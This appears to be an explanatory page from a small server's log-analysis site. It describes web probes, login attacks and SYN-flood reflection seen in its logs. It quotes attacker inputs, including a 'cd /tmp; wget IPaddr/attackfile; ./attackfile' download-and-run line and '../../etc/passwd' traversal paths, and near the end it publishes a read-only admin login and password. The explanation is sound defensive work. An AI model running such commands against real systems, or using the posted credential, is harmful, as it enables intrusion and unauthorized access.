| ·
|
polycosmic-zervertest.zapto.org
|
Web Accesses and Login Attempts Received from the World
Log Analysis
request_uri -- /web/v1/probes.html
Any internet-connected system with any ports exposed to the wild and wooly internet
should expect probes and scans from many addresses around the planet.
If this is such a system,
there may be entertaining stuff in the Log Files.
Notes on results that can be selected above --
Weblog Status Codes --
- 200 -- Okay, URL was recognized and returned a web page.
- 206 -- Partial Content was requested as a byte-range, and returned.
- 301, 302 -- Redirect. In the detail logs,
this is typically followed immediately by the GET or POST to the re-directed location.
- 304 -- Not Modified, file exists unmodified since a date given in the request,
and so does not need to be transmitted.
- 404 -- Not found, no such /directory/, file or web page.
- 401 -- Authorization needed. In the detail logs,
this can be followed by a repeat request, but with a userid and passphrase supplied.
- 400 -- Malformed or unrecognized format.
For the URL "/", the root of the documents tree,
this can occur for malformation of some additional data
that is not shown in these log entries.
- There are many other status values.
Random observations for Weblog URLs --
- .env files -- if found, expected to contain "environment values"
that might be useful to a program,
such as PATH, that describe where on a system to look for programs for command names.
Apparently there could be security-related values,
such as passwords to be automatically supplied when there is a login to another system.
- .aws files -- For Amazon Web Services?
- .git and .svn files -- git and subversion are source-code control systems
used with software development and could be used for web-site development.
Apparently looking for details of the inner working of the web-site.
- .php files -- a programming languages frequently used in web-site development.
- wp- files -- WordPress is an elaborate program (online blogs?)
that apparently has a lot of possible security vulnerabilities.
- GET /web/dnld/... -- This directory has a number of large files
first created when this represented a product from a functioning company,
including software-update files with a ".tar" suffix,
bootable CD image files (also containing software-update files) with an ".iso" suffix,
and bootable disk images (compressed) suitable for VirtualBox
with ".vdi.gz" and ".vhd.zip" suffixes.
There are not a lot of NetZerver products in use on the planet,
and it is not clear why there should be so many downloads of these files.
There have been reports of a group
looking for and downloading ".iso" files
hoping to find copyright-protected commercial releases,
with a business plan to threaten a site for copyright violations.
There may be downloads from agencies looking for trade-secret information
inadvertenly left publicly accessible.
These files may be raw material for download speed tests.
None of this seems to explain why there would be so many downloads
to so many places.
- GET /web/dnld/...(more) --
A somewhat typical web log covered about 36 hours,
of the 100 files in the /web/dnld/ directory,
there were 159 downloads for 90 different files,
each file fetched from 1 to 3 times,
from 91 different IP addresses,
with 29 from one IP address, 3 from another,
and the remainder fetching 1 or 2 files.
Of the files not downloaded during this interval,
5 were among the most recent.
The 29 files to one IP address appears to be one bot,
the other 90 IP addresses appear to be part of a separate co-ordinated effort.
Not obvious why.
- GET and POST /web/v1/contact.html --
Sending spam to "Contact Us" web pages is a distinct business model
from all of the other probes.
- GET /.well-known/... -- This directory, not usually listed as an available share,
can have multiple security-related purposes.
/.well-known/acme-challenge/ can briefly exist during an
ACME Web-Certificate verify operation,
holding files with unlikely names and unlikely contents
to demonstrate to a Certificate Authority (such as LetsEncrypt.org)
that the system accessible with a given DNS-name
is indeed the one requesting a Certificate.
/.well-known/security.txt might exist
with information of use to a security researcher,
and to those looking for one more email address to spam.
- GET /?(junk) with 302 status, GET /web/v1/?(junk) with 200 status --
These count as successful operations despite the (junk).
The "/" is a legal path for the 302-redirect
and "/web/v1/" is a legal path that selects code that will
look for an "index.html" file to display,
and otherwise will provide a list of the files within that directory.
The parameters that begin with the "?" character
could change the sort-order of that display
but are otherwise ignored.
Thus the (junk) should be harmless.
- \x16\x03... operations -- non-printable characters, hexadecimal 16 and 03, where the
operation GET, POST, or HEAD is expected.
Apparently looking for an entertaining mis-handling.
- { lines -- apparently looking for a web-server that will treat this line
as some kind of RPC-Remote-Procedure-Call.
- ../ and .%2e/ and .%2e%2f -- In path names in the URL part and in URL parameters after the '?',
this can mean to go one directory closer to the file-system root,
in an attempt to access a file that is outside of the web documents part of the file-system,
frequently ../../etc/passwd.
- wget -- This program can fetch files over the internet,
and can be found as part of the parameters for a URL that is intended
to execute as a command.
Frequently part of "cd /tmp; wget IPaddr/attackfile; ./attackfile"
trying to download and then run a file on the target system.
- wget ... %s , wget ... 0.0.0.0, wget ... 192.168.x.x --
As part of GET /cgi-bin/luci and other commands,
these addresses are evidence of poor software development by an attacker.
The "%s" makes sense in a context where it is to be replaced by an actual internet address,
but here the actual address is not present.
The IPaddress of "0.0.0.0" will not reach a real system.
IPaddresses of the form "192.168.x.x" and "10.x.x.x"
can work in a local, isolated network environment
(separated from full internet by a firewall router)
but cannot reach the intended system when run outside of that isolated space.
- favicon -- If found, can be used for a tiny graphic on a web-browser tab,
or with a line in a BookMark list.
There can be multiple favicon files for different environments, e.g. apple-touch-icon.png
- GET /../img/favicon with 400 status -- Html text for "../img/favicon-16x16.png"
(and several other favicon files)
does occur within this website within the /web/v1/ directory,
meaning that the webclient should adjust the path closer to the root,
and then go to the /img/ directory.
This allows text and images to be in different directories
without requiring a full, exact (and inflexible) path name
for the image directory.
Web browsers do this. Google (and perhaps other search engines) do this.
Unsophisticated scan bots do not.
- robots.txt -- Intended as direction to a search-engine scan
for parts of the web-site to be indexed, and parts to be left alone.
- IPaddrs mask to /24 or /64 -- A request from an individual using a web-browser
can be a small swarm of requests for the web-page,
any associated graphic files and favicon files,
all coming from a single IPv4 or IPv6 InternetProtocol address,
within a few seconds.
Deliberate scans, both search-engines and attack-bots,
frequently use multiple IP addresses that are closely associated.
Listing 32-bit IPv4 address as /24-bit regions,
and 128-bit IPv6 addresses as /64-bit regions,
is an attempt at identifying closely-associated accesses.
This is not ideal.
For example, "googlebot" addresses are in a group with a whois listing
of 66.249.64.0 up to 66.249.95.255, a much larger /19-bit range.
- host or whois lookup -- on Linux/Unix systems, command "host" IPaddr and "whois" IPaddr
can sometimes reveal a DNS-name or some organization info about the address.
This is frequently pointless, showing a rent-a-system at Amazon, Google, or Microsoft,
paid for by the attacker,
or which may have been compromised by discovery of a vulnerability
and is running a scan quietly in the background,
unaware to those who are paying the rent.
The Web access values are discarded with each reboot,
and discarded above a limit size.
Random observations for LoginLog --
- AttackBot behavior, upon stumbling onto an open port,
can vary from one Login attempt every 25 minutes
(intended to be unnoticable on casual examination of the Logfile)
from a single IPaddress,
to multiple attempts every minute using a swarm of widely-separated IPaddress,
each no more than 30 times,
over the course of months.
- Frequent userids for recent low-frequency attack -- root, admin, ubuntu.
- Userids for a high-volume attack seem to be taken from some list,
rather than just generating e.g. all 3-letter combinations.
- This software does not capture the attempted passwords,
except when the userid-password list apparently got a bit out-of-sync
and showed "userids" of "123456" and "p@ssword".
- You might see a successful ssh_check rsync_ssh login by cbertsch,
as part of the updates to this web-site.
The Login Log is maintained over system reboot,
but results are discarded above a (likely different) limit size.
Random observations for Network entries --
-
The Network entries show the current state
(rather than a log)
of open ports, established connections,
and connections being formed.
-
Connections can have very different durations --
NFS and Samba mounts could last hours or days.
FTP and SmartMirror-rsync connections could persist for minutes.
Web operations are typically started and finished within seconds.
-
Current Network state is displayed here
due to a type of internet mis-behavior known as a SYN-flood.
It appears as dozens or hundreds of connections
in SYN-RECV state.
Normal behavior moves to ESTAB state within seconds.
The apparent source of these connect-attempts is typically a compact set of
IP-Internet-Protocol addresses, such as 256 (IPv4/24) or 1024 (IPv4/22),
spread throughout that range.
What may be going on --
the apparent source of these requests,
being used by a single company or ISP-Internet-Service-Provider,
is actually the target of an overload attempt,
and this system is (unwittingly) aiding the overload.
The attacker composes the connect request as if it came from one of the target addresses,
and tosses it into the internet to be delivered to the NetZerver system.
Thus (1) the target system gets a (possibly very large) number of responses, unsolicited,
from this system with no fingerprints of the actual attacker,
and (2) this system will repeat that response to the target system
perhaps 5-6 times over a couple of minutes,
thus amplifying the load.
With enough such (unwittingly) cooperating systems,
a large load, perhaps damaging, can be generated.
The Network tcp connections, all states display
will show if the NetZerver system
has dozens or hundreds of such SYN-RECV state connections.
Remote addresses are shown in IPv6 format,
with IPv4 addresses as IP4-in-6 --
"::ffff:", followed by the IPv4 address in the usual dotted-decimal notation.
These lines are sorted by text-compare (rather than numerically)
so that e.g. after 192.168.33.0 is .1, .10, .11, .100, .101, and then .2.
- Among the many performance-monitor counts within Linux,
it appears that TCPSynRetrans shows the number
of such generated responses.
Under normal operation,
there might be a handful over a week.
Several displays will show SynRetrans/sec (or per min or per hour)
counted from system start-up
or from the previous run of this program
(recent few seconds or minutes).
- Any system that is behind a firewall
(that prevents access from the general internet)
should not have to worry about this.
If there is port-forwarding from the general internet
to an internal system,
consider if that port really needs to be open,
if it can be opened only when needed,
or if an alternate port number can be used.
If this is expected to be a low-traffic system,
then almost all of the traffic shown in these displays is the result of
various bots doing automated scans of parts of the internet address space.
Some of these scans are benign -- e.g. Google builds its indexes
by regularly scanning every system that has a name.
Some are benign-ish -- companies probing for security problems,
not to steal data or cause damage,
but to sell or provide security monitoring.
Most are looking for exploit opportunities,
to steal data,
to encrypt data for ransom,
or to load and run the attacker's code,
perhaps a keylogger hoping to capture bank-account info or passwords,
or to use the target's cpu and network bandwidth
for spam-generation, crypto-mining or for further scans of other systems.
Note that for at least one of the systems carrying this text,
at polycosmic.net,
the detailed log files can be examined
using a "read-only" admin userid "rodmin",
with credential "Heisenberg42"
Contact us at polycosmic.info /at/ gmail
or at cbertsch /at/ cox.net
All text on this website,
nonsense and otherwise,
is 100% organic generated,
with one exception:
On Contact-Us webpage,
some answers to "I-am-not-a-robot" field
appear to be generated by robots.